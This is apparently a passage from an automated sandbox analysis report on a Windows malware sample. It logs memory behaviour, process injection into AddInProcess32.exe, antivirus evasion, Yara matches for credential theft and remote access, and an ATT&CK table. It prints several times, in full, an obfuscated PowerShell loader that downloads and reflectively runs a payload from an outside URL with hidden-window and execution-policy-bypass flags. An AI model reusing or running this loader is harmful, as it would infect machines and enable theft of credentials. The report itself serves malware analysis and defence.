        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF887989009 sldt word ptr fs:[eax]4_2_00007FF887989009
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1495Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2082Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3309Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6516Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3754Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 6096Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4212Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep count: 3309 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep count: 6516 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -14757395258967632s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5944Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6424Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3736Thread sleep count: 3754 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3736Thread sleep count: 6096 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000004.00000002.1528127542.000001DFCD640000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2712121235.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: AddInProcess32.exe, 00000005.00000002.2701969146.00000000010F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 410000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A69008Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcaojzknkydqrhvybca9ihynkydlnwh0jysndccrj3ankydzoi8vawe2mccrjzaxmdaudxmuyscrj3jjaccrj2l2zs5vjysncmcvmicrjzqvaxrlbxmvzgv0yscrj2gtjysnbm90zs12l0qnkydldgfojysntm90zvyudhh0jysndmu1oycrjzlqrgjhc2u2nenvjysnbnqnkydlbnqnkycgpsaoticrj2v3lu9iaicrj2vjjysndcbtexmnkyd0zw0nkycujysntmv0lldlyknsawvudckurg93bmwnkydvywrtjysndhinkydpbmcoowpedxinkydsjysnkts5akrijysnaw5hjysncnknkyddjysnb250zw50id0gjysnw1n5cycrj3rlbs4nkyddb252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0cicrj2knkyduzygnkyc5jysnakriyxnlnjrdb24nkyd0zw4nkyd0kts5akrhc3nlbwjsesa9iftsjysnzwzszwn0jysnaw9ulkfzc2vtymwnkyd5xto6tg9hzcg5akqnkydiaw4nkydhcnldb24nkyd0zw4nkyd0kts5akqnkyd0exblid0goscrj2peyxnzzw1ijysnbhkur2v0jysnvhknkydwzsh2ztvsdw5qrs5ib21ldicrj2u1kts5jysnakqnkydtzxrob2qgpsa5aicrj0r0jysnexankydllkdlde1ldghvzch2ztvwqul2ztupozlqrg1ldccrj2hvzc4nkydjbnynkydvjysna2uoowpebnvsbccrjywgw29iamvjdccrj1snkyddxuaodmu1mc9nticrj1rhjysnqs9kl2vllmv0c2fwly86c3b0jysndggnkyd2ztuglcb2ztvkzxmnkydhdgl2ywrvdmu1icwgdmu1zgvzyxrpjysndmfkb3zlnsankycsiccrj3zlnwrlc2f0axynkydhzg92jysnztusdmunkyc1qwrksw4nkydqcicrj29jzscrj3nzmzj2ztusdmu1dmu1jysnkscrjyknks5szvbsyunlkcc5akqnlftzdhjjtkddw0noqvjdmzyplljlugxhq2uoj3zlnscsw3n0cklor11bq2hbul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex( ('9'+'jdurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/d'+'etah'+'notev.txt'+'ve5;'+'9jdbase64co'+'nt'+'ent'+' = (n'+'ew-obj'+'ec'+'t sys'+'tem'+'.'+'net.webclient).downl'+'oads'+'tr'+'ing(9jdur'+'l'+');9jdb'+'ina'+'ry'+'c'+'ontent = '+'[sys'+'tem.'+'convert]::from'+'ba'+'se64str'+'i'+'ng('+'9'+'jdbase64con'+'ten'+'t);9jdassembly = [r'+'eflect'+'ion.assembl'+'y]::load(9jd'+'bin'+'arycon'+'ten'+'t);9jd'+'type = 9'+'jdassemb'+'ly.get'+'ty'+'pe(ve5runpe.homev'+'e5);9'+'jd'+'method = 9j'+'dt'+'yp'+'e.getmethod(ve5vaive5);9jdmet'+'hod.'+'inv'+'o'+'ke(9jdnull'+', [object'+'['+']]@(ve50/mn'+'ta'+'a/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5addin'+'pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').replace('9jd',[string][char]36).replace('ve5',[string][char]39) )"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcaojzknkydqrhvybca9ihynkydlnwh0jysndccrj3ankydzoi8vawe2mccrjzaxmdaudxmuyscrj3jjaccrj2l2zs5vjysncmcvmicrjzqvaxrlbxmvzgv0yscrj2gtjysnbm90zs12l0qnkydldgfojysntm90zvyudhh0jysndmu1oycrjzlqrgjhc2u2nenvjysnbnqnkydlbnqnkycgpsaoticrj2v3lu9iaicrj2vjjysndcbtexmnkyd0zw0nkycujysntmv0lldlyknsawvudckurg93bmwnkydvywrtjysndhinkydpbmcoowpedxinkydsjysnkts5akrijysnaw5hjysncnknkyddjysnb250zw50id0gjysnw1n5cycrj3rlbs4nkyddb252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0cicrj2knkyduzygnkyc5jysnakriyxnlnjrdb24nkyd0zw4nkyd0kts5akrhc3nlbwjsesa9iftsjysnzwzszwn0jysnaw9ulkfzc2vtymwnkyd5xto6tg9hzcg5akqnkydiaw4nkydhcnldb24nkyd0zw4nkyd0kts5akqnkyd0exblid0goscrj2peyxnzzw1ijysnbhkur2v0jysnvhknkydwzsh2ztvsdw5qrs5ib21ldicrj2u1kts5jysnakqnkydtzxrob2qgpsa5aicrj0r0jysnexankydllkdlde1ldghvzch2ztvwqul2ztupozlqrg1ldccrj2hvzc4nkydjbnynkydvjysna2uoowpebnvsbccrjywgw29iamvjdccrj1snkyddxuaodmu1mc9nticrj1rhjysnqs9kl2vllmv0c2fwly86c3b0jysndggnkyd2ztuglcb2ztvkzxmnkydhdgl2ywrvdmu1icwgdmu1zgvzyxrpjysndmfkb3zlnsankycsiccrj3zlnwrlc2f0axynkydhzg92jysnztusdmunkyc1qwrksw4nkydqcicrj29jzscrj3nzmzj2ztusdmu1dmu1jysnkscrjyknks5szvbsyunlkcc5akqnlftzdhjjtkddw0noqvjdmzyplljlugxhq2uoj3zlnscsw3n0cklor11bq2hbul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex( ('9'+'jdurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/d'+'etah'+'notev.txt'+'ve5;'+'9jdbase64co'+'nt'+'ent'+' = (n'+'ew-obj'+'ec'+'t sys'+'tem'+'.'+'net.webclient).downl'+'oads'+'tr'+'ing(9jdur'+'l'+');9jdb'+'ina'+'ry'+'c'+'ontent = '+'[sys'+'tem.'+'convert]::from'+'ba'+'se64str'+'i'+'ng('+'9'+'jdbase64con'+'ten'+'t);9jdassembly = [r'+'eflect'+'ion.assembl'+'y]::load(9jd'+'bin'+'arycon'+'ten'+'t);9jd'+'type = 9'+'jdassemb'+'ly.get'+'ty'+'pe(ve5runpe.homev'+'e5);9'+'jd'+'method = 9j'+'dt'+'yp'+'e.getmethod(ve5vaive5);9jdmet'+'hod.'+'inv'+'o'+'ke(9jdnull'+', [object'+'['+']]@(ve50/mn'+'ta'+'a/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5addin'+'pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').replace('9jd',[string][char]36).replace('ve5',[string][char]39) )"Jump to behavior
        Source: AddInProcess32.exe, 00000005.00000002.2703147210.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: AddInProcess32.exe, 00000005.00000002.2703147210.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
        Source: AddInProcess32.exe, 00000005.00000002.2703147210.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
        Source: AddInProcess32.exe, 00000005.00000002.2715480413.0000000005A3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR
        Source: Yara matchFile source: 4.2.powershell.exe.1dfc5fbb650.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfcd980000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfc5fbb650.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfcd980000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1506314735.000001DFC57A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR
        Source: Yara matchFile source: 4.2.powershell.exe.1dfc5fbb650.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfcd980000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfc5fbb650.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfcd980000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1506314735.000001DFC57A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        221
        Scripting
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        OS Credential Dumping1
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        212
        Process Injection
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory13
        System Information Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter
        1
        Scheduled Task/Job
        1
